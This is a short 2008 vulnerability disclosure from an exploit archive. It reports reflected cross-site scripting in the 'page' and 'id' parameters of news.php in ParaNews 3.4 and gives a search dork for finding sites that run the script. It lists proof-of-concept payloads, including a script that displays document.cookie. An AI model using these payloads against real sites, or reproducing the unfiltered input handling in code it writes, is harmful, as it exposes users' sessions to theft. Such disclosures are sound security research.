Home / exploits paranews-xss.txt
Posted on 11 September 2008
# Author : Xylitol # Contact : n/a # Vendor : s0nic (www.monxoom.de) # Version: 3.4 # D0rks : Powered by Paranews 3.4 # Public release vulnz: 10/09/08 # Impact: low # Stop lammer #################### 1. Description: #################### Auf den Namen »ParaNews« habe ich mein Newsscript getauft, welches zur Pflege eines Newsbereich in einer Website gedacht ist. Dabei können online über ein Admin Control Panel (ACP) komfortabel News geschrieben, editiert und gelöscht werden. #################### 2. Vulnerable page: #################### news.php bad filtered value : "page" variable bad filtered value : "id" variable news.php?pn_go=details&page=[XSS]&id=[XSS] #################### 3. PoC: #################### "><script>alert(document.cookie)</script> "><marquee><h1>xyl</h1></marquee> "><script>alert(1337)</script> dont forget the "> #################### 4. Greetings: #################### Uber0n, Langy, code91, FullFreeze, meloulisi, t0fx xssing, sla.ckers and security-sh3ll ppl
